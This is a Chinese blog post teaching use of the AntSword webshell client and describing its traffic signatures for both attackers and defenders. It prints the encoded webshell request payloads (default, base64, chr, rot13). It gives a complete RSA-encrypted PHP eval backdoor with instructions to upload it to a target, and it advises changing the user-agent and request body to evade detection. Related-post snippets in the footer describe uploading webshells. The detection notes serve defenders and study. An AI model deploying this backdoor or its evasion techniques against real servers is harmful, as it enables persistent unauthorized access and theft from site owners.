攻防兼备:中国蚁剑使用指南及特征流量

已于 2023-04-12 23:12:55 修改
阅读量3.7k 收藏 18
点赞数 3
文章标签: 安全
于 2023-04-12 17:22:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/130108881
版权

中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端。

蚁剑下载安装参考:中国蚁剑(antSword)下载、安装、使用教程_蚁剑下载_攀爬的小白的博客-CSDN博客

目录

各种加密方式对比

RSA流量加密分析

UA混淆

代理设置

插件使用

总结

各种加密方式对比

蚁剑给我们提供的加密方式由四种:

default:默认方式,不推荐

tiger=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return str_rot13($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "c8b5a";echo @asenc($output);echo "ad3f9";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

其流量特征十分清晰,ini_set(),set_time_limit(),当你看到这两个字段时,就要小心了。

这种默认方式的返回包是明文传输的,可以在数据包里面看到。

base64:只要防守人员有点经验,就会被识破

_0xe5c436e26d9c2=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIHN0cl9yb3QxMygkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI3ODE4OCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMmRhYmQiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw==&tiger=@eval(@base64_decode($_POST[_0xe5c436e26d9c2]));

流量特征典型的base64,见的多了就会快速反应到。其数据返回包是base64加密

chr/chr16

tiger=@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(115).ChR(116).ChR(114).ChR(95).ChR(114).ChR(111).ChR(116).ChR(49).ChR(51).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(56).ChR(49).ChR(56).ChR(57).ChR(99).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(99).ChR(102).ChR(56).ChR(51).ChR(50).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59));

特征也很明显,其返回包也是以明文传输的。

rot13

_0xb7628defadc01=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "no03q";rpub @nfrap($bhgchg);rpub "99nr7";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q}	";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.="	";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))?@cbfvk_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.="	{$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&tiger=@eval(@str_rot13($_POST[_0xb7628defadc01]));

特征也很明显,其返回包也是以明文传输的。

蚁剑提供的集中加密方式都不太好,很容易就会被溯源到。接下引入另外一种RSA加密

RSA流量加密分析

        RSA加密算法是一种非对称加密算法,所谓非对称,就是指该算法加密和解密使用不同的密钥,即使用加密密钥进行加密、解密密钥进行解密。在RAS算法中,加密密钥(即公开密钥)PK是公开信息,而解密密钥(即秘密密钥)SK是需要保密的。

        在后门代码里面存储着公钥,以及后门代码

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIqhgvWlSjvyQ+GsQDp5xp7/7q
E1Bojg6rQnQmumr1FNlhgduSZL6YUq9OqKK4+Mz+EYgI2qHTJMvzYTWfV2C46NkK
E0EYeCIQlZl9c6zW9JUTv7zyHpcRpcstlcJReUcf+jlvuEi88M/5YFBeirHYL/Fy
utU0iNt88FzAbiX1+wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
eval($cmd);

在后门代码里面会存储公钥,用来解密传过来的数据,但返回数据时默认的是base64编码。

具体操作:AntSword——编码设置——编码管理——RSA配置——生成,生成webshell:

 将PHP后门代码上传目标即可,默认密码是ant。

在连接时选择自定义的加密选项:

这样加密有两个缺点:

  1. webshell没有混淆,需要自己去配置
  2. 返回数据包是base64编码,还是很明显,建议配合解码器,但是需要自己写,对我这种菜鸟很不友好。

静态特征

Php中使用assert,eval执行

asp使用eval

在jsp使用的是Java类加载(ClassLoader),同时会带有base64编码解码等字符特征

UA混淆

可以修改UA头,以及数据包的Body内容进行混淆,最新版本的UA已经可以实现随机了

 但如果想要自己修改的话,可以在上面进行修改。

代理设置

 可以配合burpsuite进行抓包

插件使用

        插件的话推荐一个生成hsell的插件即可。

 可以生成多种类型的shell

参考文章:

学蚁致用(二)——RSA流量免杀_limb0的博客-CSDN博客

中国蚁剑(AntSword)安装、使用教程_丶没胡子的猫的博客-CSDN博客

webshell使用与流量分析(含数据包)_webshell流量分析_zkzq的博客-CSDN博客

感谢几位大佬的分享!!!

总结

蚁剑这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。

最后创作不易,求路过大佬点赞支持一下,谢谢!!!

Dao-道法自然
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
网络攻防之加密流量检测技术洞察.pdf
04-30
加密流量的技术洞察、包含对某厂商的技术分析
中国蚁剑 配置使用
Z_l123的博客
01-13 5732
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传至靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用"中国蚁剑"连接靶机上的 muma.php 1)打开中国蚁剑 2)在
攻防演练:以攻促防:企业蓝军建设思考.docx
09-14
攻防演练:以攻促防:企业蓝军建设思考.docx
中国蚁剑安装使用教程
最新发布
Karka_的博客
03-21 1325
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
antswordの加载器&源码
04-14
因为这个 的源码在线下载的速度实在太慢了,这里分享了一下这个的加载器与源码,直接加载就行了,网络上有相关的安装教程。压缩包里有两个文件哦!
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
中国蚁剑使用教程.zip
12-12
中国蚁剑使用教程.zip 中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
流量分析
m0_56937298的博客
04-03 4897
通过Wireshark分析一句话木马
中国蚁剑使用
m0_49506405的博客
01-17 573
1.在win7上phpstudy网站上,上传一句话木马 一句话木马 修改文件名为 .php 后缀 上传1.php 2.在操作机上利用中国蚁剑链接靶机上的1.php 在空白部分右键添加数据 点击添加 登录成功
菜刀、冰蝎、、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 1万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
x1DecoderPlus:AntSword()全参数流量XOR和Base64加伪装WebShell
05-13
介绍 AntSword()全参数流量XOR+Base64,基于基础上进行改造,主要用来逃避一些流量检测。 使用 php、jsp、asp文件夹中会有单独的README文件,打开后可以看到具体的使用说明。 或者可以直接在github上点击进去也可以看到 版本 v2.1.10 更新 2021年4月27日 增加Asp支持(基础功能没问题,不排除会有Bug,欢迎提交issue。) 2021年2月28日 增加Jsp支持 2021年2月23日 增加WebShell伪装,增大XOR-Key值,加多一层Base64编码传输。
AntSword v2.0.1在windows平台上使用
04-16
中国蚁剑是一款开源的跨平台网站管理工具,主要面向于渗透测试安全和其他一些常规操作。
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
kali2022安装中国蚁剑(AndSword)
爱吃仡坨的Blog
10-15 1635
AntSword 源码v2.1.15 下载地址。​ 软件包准备 AntSword 源码v2.1.15 下载地址 https://github.com/AntSwordProject/antSword/archive/refs/tags/2.1.15.tar.gz AntSword-Loader加载器下载地址(选Linux就完事了): https://github.com/AntSwordProjec/AntSword-Loader/releases/download/4.0.3/AntSword-L
的下载、安装与使用
永远是少年
10-09 3891
今天继续给大家介绍渗透测试相关知识,本文主要内容是的下载、安装与使用。 一、简介 二、安装 三、使用
webshell管理工具-antSword()的安装和管理
黄乔国PHP
03-12 4543
中国蚁剑是一款流行的网络安全工具,它由中国安全研究人员研发,主要用于测试和评估网络的安全性。具有强大的功能,可以用于远程控制和管理服务器,包括文件管理、进程管理、端口扫描、SQL注入、WebShell等功能。它还可以在未授权的情况下访问和操纵目标系统,因此也被一些黑客用作恶意攻击的工具。尽管具有一些有用的功能,但它也被广泛用于恶意活动中。因此,使用应该遵循合法和道德原则,只用于合法的网络安全测试和评估。
webshell连接工具流量特征
wojiaoqwe的博客
01-17 512
本文仅当作记录使用,方便后期查找。
流量特征分析——、菜刀、冰蝎
Sgirll的博客
07-22 4372
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。网络管理员和安全专家可以根据这些特征来识别和监测潜在的攻击活动,并及时采取相应的防护措施。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。本文将重点研究菜刀、和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。(AntSword)是一款功能强大的跨平台渗透测试工具,被广泛用于攻击和渗透测试活动。
使用哪个插件可以disable_functions
09-11
### 回答1: 是一款基于Java开发的多功能跨平台WebShell管理工具,可以通过插件来扩展其功能。如果你想要禁用PHP的`disable_functions`选项,可以使用的PHP插件来实现。 具体步骤如下: 1. 打开,点击左侧导航栏的“插件中心”按钮,找到并安装“PHP”插件。 2. 安装完成后,点击左侧导航栏的“文件管理器”按钮,找到你的PHP程序所在的目录,右键点击该目录并选择“编辑”->“配置”。 3. 在弹出的配置窗口中,找到“禁用函数”选项,将其值设置为空(即不禁用任何函数),然后点击“保存”。 这样就可以通过的PHP插件来禁用`disable_functions`选项了。请注意,在某些服务器上,禁用函数可能会受到其他安全措施的限制,因此可能需要其他措施来实现您的需求。 ### 回答2: 是一款功能强大的网络攻击工具,可以用于渗透测试和网络攻击。为了防止被攻击者滥用,在其代码中内置了disable_functions功能。 如果你想禁用可执行的函数,可以使用中的内置插件"disable_functions"来实现。该插件可以通过修改PHP配置文件来禁用指定的函数。 使用的"disable_functions"插件进行禁用函数操作,首先你需要连接到目标主机并获取相应的文件管理权限。然后,在的菜单中选择"插件"选项,并点击"disable_functions"插件。 在插件界面中,你可以看到当前的PHP配置文件。在"disable_functions"字段中,输入你要禁用的函数列表,多个函数之间用英文逗号分隔。 当你输入完禁用函数列表后,点击"保存"按钮。将会自动修改PHP配置文件并重新加载配置文件,以使禁用函数生效。 总结起来,提供了内置的"disable_functions"插件,可以通过修改PHP配置文件来禁用指定的函数。这是一种保护系统安全、防止攻击滥用的有效措施。但是使用这个功能时,需要谨慎选择禁用的函数,以免影响系统的正常运行。 ### 回答3: 是一款流行的网络安全工具,它主要用于对远程服务器进行渗透测试和安全评估。提供了丰富的功能和插件,可以帮助用户执行各种操作。其中,一个插件可以用于禁用函数(disable_functions)。 这个插件叫做“Function Manager”(函数管理器),它是的一个内置功能插件。用户可以在中打开插件管理界面,找到“Function Manager”插件并启用它。 启用“Function Manager”插件后,用户可以在的界面中找到一个名为“禁用函数”的选项。通过点击该选项,用户可以看到一个列表,其中包含了各种常见的PHP函数,如eval()、exec()、system()等。用户可以根据需要选择需要禁用的函数,然后点击确认以应用修改。 禁用函数可以帮助用户提高服务器的安全性,防止潜在的攻击者利用恶意代码执行一些危险的操作。例如,禁用eval()函数可以防止攻击者通过执行动态代码来获取服务器的敏感信息或者执行恶意操作。 需要注意的是,禁用函数也可能影响到服务器的正常运行,因此在选择禁用函数之前,用户应该仔细评估其影响,并确保所禁用的函数不会对系统的正常功能产生太大的影响。用户还应该定期检查禁用函数的配置,以确保服务器的安全性和正常运行的平衡。 总之,的“Function Manager”插件是一种方便的工具,可以帮助用户禁用函数以提高服务器的安全性。但在使用该功能时,用户应该谨慎评估其影响,并确保服务器的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值